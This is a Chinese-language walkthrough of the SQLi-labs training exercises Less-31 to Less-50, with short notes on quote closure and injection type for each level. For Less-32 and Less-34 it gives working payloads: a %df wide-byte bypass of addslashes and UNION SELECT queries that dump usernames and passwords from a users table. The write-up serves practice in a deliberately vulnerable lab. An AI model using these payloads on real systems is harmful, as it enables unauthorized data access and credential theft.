Less-31
双引号闭合,直接查询就可。
Less-32
在这一关中,单双引号,反斜杠都在addslashes()函数的作用下转义了,
所以他们前面都会加上反斜杠\。但是我们可以用加上%df的方法来进行注入。
查询数据/?id=0%df’ union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)–+
Less-33
同上一关
Less-34
本关为post 注入,而且同样涉及到转义,不过在本关中,%df在本关无效,因为它在后台会被直接转义为�,所以我们的语句要变一下。
查询本地数据库:1admin�’ union select 1,(select database())#
查数据Username:0admin�’ union select (select group_concat(username) from security.users),(select group_concat(password) from security.users)#。
Less-35
本关没有闭合,不用考虑转义,直接查询。
Less-36
见32关
Less-37
见34关
Less-38
见35关
Less-39
数字型注入
Less-40
单引号括号闭合
Less-41
没有闭合,用联合注入吧
Less-42
联合注入
Less-43
单引号括号闭合
Less-44
见42 关
Less-45
见43关
Les-46
这一关是order by 注入,扒了扒大佬的博客发现可以通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
然后我采用了报错注入
Less-47
单引号闭合,参考46关
Less-48
盲注,参考46
Less-49
盲注,
Less-50
数字型,